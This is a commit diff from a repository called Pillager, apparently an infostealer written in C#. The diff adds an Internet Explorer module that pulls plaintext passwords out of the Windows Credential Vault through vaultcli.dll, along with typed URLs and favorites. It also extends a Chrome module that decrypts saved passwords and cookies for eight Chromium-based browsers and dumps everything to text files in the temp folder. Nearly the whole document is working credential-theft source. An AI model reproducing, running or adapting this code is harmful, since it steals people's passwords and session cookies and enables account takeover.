qwqdanchun
/
Pillager
mirror of https://github.com/qwqdanchun/Pillager.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

update

This commit is contained in:
qwqdanchun 2023-04-24 23:38:01 +08:00
parent e58da0f648
commit 3288f9878c
8 changed files with 437 additions and 34 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
Pillager/Chrome.cs → Pillager/Browsers/Chrome.cs
View File

@ -1,11 +1,11 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using Pillager.Helper;
namespace Pillager
namespace Pillager.Browsers
{
public class Chrome
{
@ -26,7 +26,7 @@ namespace Pillager
{
string filePath = Path.Combine(Directory.GetParent(BrowserPath).FullName, "Local State");
byte[] masterKey = new byte[] { };
if (File.Exists(filePath) == false)
if (!File.Exists(filePath))
return null;
var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath));
foreach (System.Text.RegularExpressions.Match prof in pattern)
@ -71,7 +71,7 @@ namespace Pillager
return decryptedData;
}
internal string Chrome_passwords()
public string Chrome_passwords()
{
StringBuilder passwords = new StringBuilder();
string loginDataPath = Path.Combine(BrowserPath, "Login Data");
@ -141,8 +141,6 @@ namespace Pillager
return history.ToString(); ;
}
public string Chrome_cookies()
{
StringBuilder cookies = new StringBuilder();
@ -177,7 +175,6 @@ namespace Pillager
return cookies.ToString();
}
public string Chrome_books()
{
StringBuilder stringBuilder = new StringBuilder();
@ -188,5 +185,23 @@ namespace Pillager
}
return stringBuilder.ToString();
}
public void Save(string path)
{
if (MasterKey==null)
{
return;
}
string savepath = Path.Combine(path, BrowserName);
Directory.CreateDirectory(savepath);
string cookies = Chrome_cookies();
string passwords = Chrome_passwords();
string books = Chrome_books();
string history = Chrome_history();
File.WriteAllText(Path.Combine(savepath, BrowserName + "_cookies.txt"), cookies);
File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
}
}
}

278
Pillager/Browsers/IE.cs Normal file
View File

@ -0,0 +1,278 @@
using Microsoft.Win32;
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
namespace Pillager.Browsers
{
public static class IE
{
public static string BrowserName = "IE";
public static string IE_passwords()
{
StringBuilder sb = new StringBuilder();
var OSVersion = Environment.OSVersion.Version;
var OSMajor = OSVersion.Major;
var OSMinor = OSVersion.Minor;
Type VAULT_ITEM;
if (OSMajor >= 6 && OSMinor >= 2)
{
VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN8);
}
else
{
VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN7);
}
/* Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct */
object GetVaultElementValue(IntPtr vaultElementPtr)
{
object results;
object partialElement = System.Runtime.InteropServices.Marshal.PtrToStructure(vaultElementPtr, typeof(VaultCli.VAULT_ITEM_ELEMENT));
FieldInfo partialElementInfo = partialElement.GetType().GetField("Type");
var partialElementType = partialElementInfo.GetValue(partialElement);
IntPtr elementPtr = (IntPtr)(vaultElementPtr.ToInt64() + 16);
switch ((int)partialElementType)
{
case 7: // VAULT_ELEMENT_TYPE == String; These are the plaintext passwords!
IntPtr StringPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr);
results = System.Runtime.InteropServices.Marshal.PtrToStringUni(StringPtr);
break;
case 0: // VAULT_ELEMENT_TYPE == bool
results = System.Runtime.InteropServices.Marshal.ReadByte(elementPtr);
results = (bool)results;
break;
case 1: // VAULT_ELEMENT_TYPE == Short
results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr);
break;
case 2: // VAULT_ELEMENT_TYPE == Unsigned Short
results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr);
break;
case 3: // VAULT_ELEMENT_TYPE == Int
results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr);
break;
case 4: // VAULT_ELEMENT_TYPE == Unsigned Int
results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr);
break;
case 5: // VAULT_ELEMENT_TYPE == Double
results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Double));
break;
case 6: // VAULT_ELEMENT_TYPE == GUID
results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Guid));
break;
case 12: // VAULT_ELEMENT_TYPE == Sid
IntPtr sidPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr);
var sidObject = new System.Security.Principal.SecurityIdentifier(sidPtr);
results = sidObject.Value;
break;
default:
/* Several VAULT_ELEMENT_TYPES are currently unimplemented according to
* Lord Graeber. Thus we do not implement them. */
results = null;
break;
}
return results;
}
/* End helper function */
Int32 vaultCount = 0;
IntPtr vaultGuidPtr = IntPtr.Zero;
var result = VaultCli.VaultEnumerateVaults(0, ref vaultCount, ref vaultGuidPtr);
//var result = CallVaultEnumerateVaults(VaultEnum, 0, ref vaultCount, ref vaultGuidPtr);
if ((int)result != 0)
{
throw new Exception("[ERROR] Unable to enumerate vaults. Error (0x" + result.ToString() + ")");
}
// Create dictionary to translate Guids to human readable elements
IntPtr guidAddress = vaultGuidPtr;
Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>();
vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note");
vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential");
vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector");
vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials");
vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials");
vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential");
vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential");
vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential");
vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null);
for (int i = 0; i < vaultCount; i++)
{
// Open vault block
object vaultGuidString = System.Runtime.InteropServices.Marshal.PtrToStructure(guidAddress, typeof(Guid));
Guid vaultGuid = new Guid(vaultGuidString.ToString());
guidAddress = (IntPtr)(guidAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(typeof(Guid)));
IntPtr vaultHandle = IntPtr.Zero;
string vaultType;
if (vaultSchema.ContainsKey(vaultGuid))
{
vaultType = vaultSchema[vaultGuid];
}
else
{
vaultType = vaultGuid.ToString();
}
result = VaultCli.VaultOpenVault(ref vaultGuid, (UInt32)0, ref vaultHandle);
if (result != 0)
{
throw new Exception("Unable to open the following vault: " + vaultType + ". Error: 0x" + result.ToString());
}
// Vault opened successfully! Continue.
// Fetch all items within Vault
int vaultItemCount = 0;
IntPtr vaultItemPtr = IntPtr.Zero;
result = VaultCli.VaultEnumerateItems(vaultHandle, 512, ref vaultItemCount, ref vaultItemPtr);
if (result != 0)
{
throw new Exception("[ERROR] Unable to enumerate vault items from the following vault: " + vaultType + ". Error 0x" + result.ToString());
}
var structAddress = vaultItemPtr;
if (vaultItemCount > 0)
{
// For each vault item...
for (int j = 1; j <= vaultItemCount; j++)
{
// Begin fetching vault item...
var currentItem = System.Runtime.InteropServices.Marshal.PtrToStructure(structAddress, VAULT_ITEM);
structAddress = (IntPtr)(structAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(VAULT_ITEM));
IntPtr passwordVaultItem = IntPtr.Zero;
// Field Info retrieval
FieldInfo schemaIdInfo = currentItem.GetType().GetField("SchemaId");
Guid schemaId = new Guid(schemaIdInfo.GetValue(currentItem).ToString());
FieldInfo pResourceElementInfo = currentItem.GetType().GetField("pResourceElement");
IntPtr pResourceElement = (IntPtr)pResourceElementInfo.GetValue(currentItem);
FieldInfo pIdentityElementInfo = currentItem.GetType().GetField("pIdentityElement");
IntPtr pIdentityElement = (IntPtr)pIdentityElementInfo.GetValue(currentItem);
FieldInfo dateTimeInfo = currentItem.GetType().GetField("LastModified");
UInt64 lastModified = (UInt64)dateTimeInfo.GetValue(currentItem);
object[] vaultGetItemArgs;
IntPtr pPackageSid = IntPtr.Zero;
if (OSMajor >= 6 && OSMinor >= 2)
{
// Newer versions have package sid
FieldInfo pPackageSidInfo = currentItem.GetType().GetField("pPackageSid");
pPackageSid = (IntPtr)pPackageSidInfo.GetValue(currentItem);
result = VaultCli.VaultGetItem_WIN8(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, pPackageSid, IntPtr.Zero, 0, ref passwordVaultItem);
}
else
{
result = VaultCli.VaultGetItem_WIN7(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, IntPtr.Zero, 0, ref passwordVaultItem);
}
if (result != 0)
{
throw new Exception("Error occured while retrieving vault item. Error: 0x" + result.ToString());
}
object passwordItem = System.Runtime.InteropServices.Marshal.PtrToStructure(passwordVaultItem, VAULT_ITEM);
FieldInfo pAuthenticatorElementInfo = passwordItem.GetType().GetField("pAuthenticatorElement");
IntPtr pAuthenticatorElement = (IntPtr)pAuthenticatorElementInfo.GetValue(passwordItem);
// Fetch the credential from the authenticator element
object cred = GetVaultElementValue(pAuthenticatorElement);
object packageSid = null;
if (pPackageSid != IntPtr.Zero && pPackageSid != null)
{
packageSid = GetVaultElementValue(pPackageSid);
}
if (cred != null) // Indicates successful fetch
{
sb.AppendLine("\tVault Type : {"+ vaultType + "}");
object resource = GetVaultElementValue(pResourceElement);
if (resource != null)
{
sb.AppendLine("\tVault Type : {" + resource + "}");
}
object identity = GetVaultElementValue(pIdentityElement);
if (identity != null)
{
sb.AppendLine("\tVault Type : {" + identity + "}");
}
if (packageSid != null)
{
sb.AppendLine("\tVault Type : {" + packageSid + "}");
}
sb.AppendLine("\tVault Type : {" + cred + "}");
// Stupid datetime
sb.AppendLine("\tLastModified : {"+ DateTime.FromFileTimeUtc((long)lastModified) + "}");
sb.AppendLine();
}
}
}
}
return sb.ToString();
}
public static string IE_history()
{
StringBuilder sb = new StringBuilder();
RegistryKey myreg = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Explorer\\TypedURLs");
string[] urls = new string[26];
for (int i = 1; i < 26; i++)
{
try
{
urls[i] = myreg.GetValue("url" + i.ToString()).ToString();
}
catch { }
}
foreach (string url in urls)
{
if (url != null)
{
sb.AppendLine(url);
}
}
return sb.ToString();
}
public static string IE_books()
{
StringBuilder sb = new StringBuilder();
string book_path = Environment.GetFolderPath(Environment.SpecialFolder.Favorites);
string[] files = Directory.GetFiles(book_path, "*.url", SearchOption.AllDirectories);
foreach (string url_file_path in files)
{
if (File.Exists(url_file_path) == true)
{
string booktext = File.ReadAllText(url_file_path);
Match match = Regex.Match(booktext, @"URL=(.*?)\n");
sb.AppendLine($"\t{url_file_path}");
sb.AppendLine($"\t\t{match.Value}");
}
}
return sb.ToString();
}
public static void Save(string path)
{
string savepath = Path.Combine(path, BrowserName);
Directory.CreateDirectory(savepath);
string passwords = IE_passwords();
string books = IE_books();
string history = IE_history();
File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
}
}
}

4
Pillager/AesGcm.cs → Pillager/Helper/AesGcm.cs
View File

@ -1,11 +1,9 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
namespace Pillager
namespace Pillager.Helper
{
//AES GCM from https://github.com/dvsekhvalnov/jose-jwt
internal class AesGcm

5
Pillager/BCrypt.cs → Pillager/Helper/BCrypt.cs
View File

@ -1,10 +1,7 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Pillager
namespace Pillager.Helper
{
public static class BCrypt
{

3
Pillager/SQLiteHandler.cs → Pillager/Helper/SQLiteHandler.cs
View File

@ -1,11 +1,10 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Pillager
namespace Pillager.Helper
{
public class SQLiteHandler
{

100
Pillager/Helper/VaultCli.cs Normal file
View File

@ -0,0 +1,100 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Pillager.Helper
{
public static class VaultCli
{
public enum VAULT_ELEMENT_TYPE : Int32
{
Undefined = -1,
Boolean = 0,
Short = 1,
UnsignedShort = 2,
Int = 3,
UnsignedInt = 4,
Double = 5,
Guid = 6,
String = 7,
ByteArray = 8,
TimeStamp = 9,
ProtectedArray = 10,
Attribute = 11,
Sid = 12,
Last = 13
}
public enum VAULT_SCHEMA_ELEMENT_ID : Int32
{
Illegal = 0,
Resource = 1,
Identity = 2,
Authenticator = 3,
Tag = 4,
PackageSid = 5,
AppStart = 100,
AppEnd = 10000
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
public struct VAULT_ITEM_WIN8
{
public Guid SchemaId;
public IntPtr pszCredentialFriendlyName;
public IntPtr pResourceElement;
public IntPtr pIdentityElement;
public IntPtr pAuthenticatorElement;
public IntPtr pPackageSid;
public UInt64 LastModified;
public UInt32 dwFlags;
public UInt32 dwPropertiesCount;
public IntPtr pPropertyElements;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
public struct VAULT_ITEM_WIN7
{
public Guid SchemaId;
public IntPtr pszCredentialFriendlyName;
public IntPtr pResourceElement;
public IntPtr pIdentityElement;
public IntPtr pAuthenticatorElement;
public UInt64 LastModified;
public UInt32 dwFlags;
public UInt32 dwPropertiesCount;
public IntPtr pPropertyElements;
}
[StructLayout(LayoutKind.Explicit, CharSet = CharSet.Ansi)]
public struct VAULT_ITEM_ELEMENT
{
[FieldOffset(0)] public VAULT_SCHEMA_ELEMENT_ID SchemaElementId;
[FieldOffset(8)] public VAULT_ELEMENT_TYPE Type;
}
[DllImport("vaultcli.dll")]
public extern static Int32 VaultOpenVault(ref Guid vaultGuid, UInt32 offset, ref IntPtr vaultHandle);
[DllImport("vaultcli.dll")]
public extern static Int32 VaultCloseVault(ref IntPtr vaultHandle);
[DllImport("vaultcli.dll")]
public extern static Int32 VaultFree(ref IntPtr vaultHandle);
[DllImport("vaultcli.dll")]
public extern static Int32 VaultEnumerateVaults(Int32 offset, ref Int32 vaultCount, ref IntPtr vaultGuid);
[DllImport("vaultcli.dll")]
public extern static Int32 VaultEnumerateItems(IntPtr vaultHandle, Int32 chunkSize, ref Int32 vaultItemCount, ref IntPtr vaultItem);
[DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")]
public extern static Int32 VaultGetItem_WIN8(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr pPackageSid, IntPtr zero, Int32 arg6, ref IntPtr passwordVaultPtr);
[DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")]
public extern static Int32 VaultGetItem_WIN7(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr zero, Int32 arg5, ref IntPtr passwordVaultPtr);
}
}

10
Pillager/Pillager.csproj
View File

@ -41,12 +41,14 @@
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="AesGcm.cs" />
<Compile Include="BCrypt.cs" />
<Compile Include="Chrome.cs" />
<Compile Include="Browsers\IE.cs" />
<Compile Include="Helper\AesGcm.cs" />
<Compile Include="Helper\BCrypt.cs" />
<Compile Include="Browsers\Chrome.cs" />
<Compile Include="Helper\VaultCli.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="SQLiteHandler.cs" />
<Compile Include="Helper\SQLiteHandler.cs" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

42
Pillager/Program.cs
View File

@ -1,8 +1,8 @@
using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using Pillager.Browsers;
namespace Pillager
{
@ -11,18 +11,32 @@ namespace Pillager
static void Main(string[] args)
{
string savepath = Path.GetTempPath();
string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
"Google\\Chrome\\User Data\\Default");
Chrome chrome = new Chrome("Chrome", chromepath);
string cookies = chrome.Chrome_cookies();
string passwords = chrome.Chrome_passwords();
string books = chrome.Chrome_books();
string history = chrome.Chrome_history();
File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_cookies.txt"), cookies);
File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_passwords.txt"), passwords);
File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_books.txt"), books);
File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_history.txt"), history);
Console.WriteLine("Files wrote to " + savepath + chrome.BrowserName + "_*.txt");
//IE
IE.Save(savepath);
Console.WriteLine("Files wrote to " + savepath + IE.BrowserName + "\\");
//Chrome
List<List<string>> browserOnChromium = new List<List<string>>()
{
new List<string>() { "Chrome", "Google\\Chrome\\User Data\\Default" } ,
new List<string>() { "Chrome Beta", "Google\\Chrome Beta\\User Data\\Default" } ,
new List<string>() { "Chromium", "Chromium\\User Data\\Default" } ,
new List<string>() { "Edge", "Microsoft\\Edge\\User Data\\Default" } ,
new List<string>() { "Brave-Browse", "BraveSoftware\\Brave-Browser\\User Data\\Default" } ,
new List<string>() { "QQBrowser", "Tencent\\QQBrowser\\User Data\\Default" } ,
new List<string>() { "Vivaldi", "Vivaldi\\User Data\\Default" } ,
new List<string>() { "CocCoc", "CocCoc\\Browser\\User Data\\Default" }
//new List<string>() { "", "" } ,
};
foreach (List<string> browser in browserOnChromium)
{
string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
browser[1]);
Chrome chrome = new Chrome(browser[0], chromepath);
chrome.Save(savepath);
Console.WriteLine("Files wrote to " + savepath + chrome.BrowserName + "\\");
}
}
}
}